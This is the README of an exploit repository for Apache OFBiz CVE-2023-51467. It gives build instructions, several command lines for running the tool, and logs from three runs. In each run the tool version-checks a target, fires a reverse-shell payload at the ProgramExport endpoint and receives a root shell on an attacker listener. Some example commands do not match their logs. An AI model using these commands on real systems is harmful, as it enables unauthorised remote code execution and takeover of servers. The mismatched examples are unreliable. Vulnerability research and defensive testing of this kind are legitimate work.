Skip to content

Latest commit

 

History

History
90 lines (76 loc) · 5.26 KB

README.md

File metadata and controls

90 lines (76 loc) · 5.26 KB

Go-Exploit for CVE-2023-51467

This repository contains a go-exploit for Apache OFBiz CVE-2023-51467. The implementation contains target verification, a version scanner, and an in-memory Nashorn reverse shell as the payload (requires the Java in use supports Nashorn). The weaponization process is described on the VulnCheck blog.

Compiling

You can use the makefile to build a docker container:

make docker

Or, if you have a Go build environment ready to go, just use make:

albinolobster@mournland:~/cve-2023-51467$ make
gofmt -d -w cve-2023-51467.go 
golangci-lint run --fix cve-2023-51467.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-51467_linux-arm64 cve-2023-51467.go
albinolobster@mournland:~/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -h
An exploit for Apache OFBiz CVE-2023-51467 that can generate a reverse shell or bind shell

Example Usage

Using Docker

albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ sudo docker run -it --network=host cve-2023-51467 -v -c -e -rhost 10.9.49.88 -rport 8090 -lhost 10.9.49.85 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"

Encrypted Nashorn Reverse Shell

albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"

Unencrypted Reverse Shell

albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270 
time=2024-01-03T16:55:51.232-05:00 level=STATUS msg="Starting listener on 10.9.49.131:1270"
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:52.595-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Sending a reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:52.948-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:38038"
time=2024-01-03T16:55:52.948-05:00 level=STATUS msg="Active shell from 10.9.49.121:38038"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:58.861-05:00 level=STATUS msg="Exploit exited with an error"